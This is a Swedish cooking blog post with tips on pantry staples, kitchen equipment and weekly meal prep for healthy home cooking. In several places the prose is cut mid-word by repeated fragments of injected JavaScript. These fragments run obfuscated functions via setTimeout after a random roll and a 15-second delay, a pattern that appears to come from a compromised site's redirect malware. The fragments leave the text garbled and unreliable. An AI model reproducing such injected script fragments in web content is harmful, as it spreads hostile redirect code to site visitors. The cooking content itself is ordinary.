Bra att ha hemma i förrådet och saker att tänka på

By : | 0 Comments | On : September 7, 2013 | Category : Jonas Andersson, Skribenter

Photo_CD_15

Tänkte dela med mig lite av mina tankar, funderingar och andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ra bra tips hur man lättast håller sig till en sund kost och inte dras till den mörka sidan.Jag älskar att improvisera i köket men jag vet att dom flesta vet inte vad dom ska laga till sitt nästa mål så det blir lätt en pizza eller något annat osunt.Jag älskar att gå in i köket med en svag ide vad jag ska laga och börja på en linje sen helt plötsligt har  jag lagat något helt annat än vad jag hade tänkt laga från början. För när jag är på jobbet så ska allt lagas med recept och se lika dant ut hela tiden. Varje rätt ska se ut som den gjorde förra gången den serverades och smaka på samma sätt som den gjorde första gången den tillagades.Så när jag är ledig och lagar mat hemma så finns det ingen bättre känsla att gå in på känsla och precis som en dirigent leka fram vad som kommer att lagas..

Men för er som inte vet vad ni ska laga eller inte är helt säkra på om ni kan kombinera olika ingredienser så ska jag komma med några punkter som ni kan tänka på när ni funderar på vad som kan vara bra att ha i ert nästa mål, eller vad som vore bra att ha hemma i förrådet. För se det så här, desto mer ni har på lager hemma desto mindre risk finns det när hungern och tröttheten kommer krypandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}e efter en lång dag att dras till den underbara doften av pizza, kebab eller hamburgare som finns på vägen hem.

 •  Gå aldrig in i köket eller till affären utan en plan eller när ni  är hungriga.
 • Se till att ha ett par stycken bra knivar som är vassa för det blir så mycket roligare att laga mat då.
 • Se till att ha ordentliga stekpannor och grytor hemma och helst en wok samt en bra ugnsform.
 • En liten köksvåg är alltid bra att ha. Ni lär er snabbt att se hur mycket vissa ingredienser väger sen räcker ögonmått.
 • Investera i köksmixer, handom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}mixer, elvisp, kitchen aid. Dom håller i en evighet.
 • Se till att ha ett par bra skärbrädor som ska sköljas rent och diskas förhandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} efter varje tillagad måltid. Använd helst en till kött och en till grönsaker.
 • Normalt ska det inte ta längre tid att laga maten än vad det tar för kolhydrater som ris, pasta eller potatis tar att bli färdig.
 • Förbered maten innan ni tillagar den. Det är A och O med förberedelse då blir det mindre stress under tiden ni lagar mat och den blir klar snabbare.
 • Se till att håla rent och städat för det finns inget mer stressandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}e än ett stökigt kök som man inte hittar något i.

Bra saker att ha hemma

Bara för några år sedan var jag  en snobb kock, jag gillade verkligen inte frysta eller färdiga produkter men dagens produkter är så bra och hälsosamma att det är ett bra alternativ till färska grönsaker. Jag föredrar fortfarandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}e färska och helst ekologiska men har alltid en påse i frysen för gånger när jag inte har lust eller ork att fixa färska.

 • Alla typer av kryddor är bra att ha hemma.
 • Färska örter i all ära men dom håller bara ett par dagar och man har inte alltid lust att springa och köpa färska hela tiden det är inte ekonomiskt helt enkelt. Så jag har alltid ett gäng torra hemma, för örter är det bästa som finns för att leka med smakerna i maten. Ni kan ändra en hel rätt genom att bara  tillägga en ört.
 • Lika så med grönsaker. Jag har alltid en laddning i frysen för dagar jag helt enkelt inte har haft lust eller tid att köpa färska. Men det sker sällan för jag ser alltid till att ha färska i kylen för jag vet aldrig vad jag är sugen på.
 • Frukter. Det har jag alltid i kylen och varje vecka portions förpackar jag en stor laddning och frysen in dom för fukt måste finnas hemma till dagens smoothie.
 • Alla typer av ris och vete sorter. Det finns en hel uppsjö av olika sorter som tex, couscous, bulgur, vetekorn, mathavre, råris, risotto, quinoa, kamutvete. Ja helt enkelt en hel del som är bra när man är trött på det gamla vanliga.
 • Oljor. olivolja i all ära. Men själv använder jag inte det längre mer än i kanske sallader eller i marinader för olivolja har en väldigt stark smak som hänger med i maten. Jag tycker kokosfett eller solrosolja är bättre men det finns en hel del oljor för olika tillfällen som sesam olja, jordnötsolja och pumpaolja.
 • Vinäger. Det finns flera olika som alla har sin plats i maten. Som tex röd och vitvinsvinäger, svart och vitbalsamic vinäger, äppelcidervinäger, citronsaft.
 • Burkmat som tex krossad tomat, tonfisk, kokosmjölk light, jordnötssmör, olika typer av bönor, linser, ajvar, sockerfri sylt, och allt annat som kan tänkas kännas rätt när suget slår på.

Nu säger jag inte att ni ska springa till affären och handom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}la allt ni kan hitta utan ni håller ögonen öppna när ni ändå är i affären och tar en eller två nya ingredienser som är bra att ha hemma.

Du kan i slutet av din matveckan som söndagen hacka ner lite chili och vitlök i separata burkar så att det räcker för hela veckan, du kan om du vill marinera allt i lite olja och kryddor så står det sig i kylen i minst 5 – 7 dagar under förutsättningen att ingen håller på och petar där och släpper in en massa bakterier.
Gör en tomat, mango, grönsaks eller annan typ av kompott eller sås och någon typ av råkost sallad eller ketchup i förväg som du har som tillbehör till maten för några dagar framåt.
Koka ris eller annat tillbehör för några dagar framåt, t.ex. ris för tre till fem dagar. Ta den torra vikten gånger 2.6 så har du den kokta vikten. Potatis väger lika mycket rått som kokt
Strimla kyckling eller annan proteinrik föda och dela upp i portionsförpackningar efter en för dig avsedd storlek/portion.
När du lagar en rätt så gör en laddning för 5 dagar eller mer och fördela dem i portioner.

Om du följer dessa tips och trix så har du en bra bas för att göra mat sunt och enkelt, om du har allt hackat och kokat i kylen så är du medveten om att du själv har förberett färsk och fräsch mat som det sen känns jobbigt att kasta om du sedan skulle välja att äta ute istället. Sen lär du dig väldigt snabbt hur du ska göra allt på så kort tid som möjligt.

Genom att laga mat hemma och lära sig hur mycket visa grönsaker och proteiner väger så lär du dig se på maten du äter ute hur mycket kalorier det innehåller på ett ungefär, sen genom att ät en lunch ute och två måltider hemma varav ett lite lättare mål mot kvällen gör livet så mycket lättare om du har en aning om vad du får i dig.

Men var inte rädd för att unna dig något ute då och då så länge du håller dig till sund och nyttig mat den mesta delen av tiden. Och genom att följa mina tips, idéer och recept på min blogg så kan inte livet bli mycket lättare för sund och nyttig mat behöver inte vara tråkigt och smaklöst. Och jag lovar dig om du äter sundare och rör på dig några gånger i veckan så kommer du får mer energi, bättre välmående och en sund kost gör mer för kroppen än dom flesta läkemedel, och det vet jag från egna erfarenheter. Om ni väljer att äta lchf, lchq, paello, raw, iso, GI, Ferry food/jägarkost, nordisk, medelhavs, järnkost, 5:2 eller högprotein/BB diet  så är det upp till er men samma regler gäller. Själv så anser jag att en kost som passar just dig och ditt dagliga behov är den mest optimala.

Följ mig gärna på Facebook Enkelt sunt & gott och på instagram enkeltsuntgott.

Post A Comment

Current ye@r *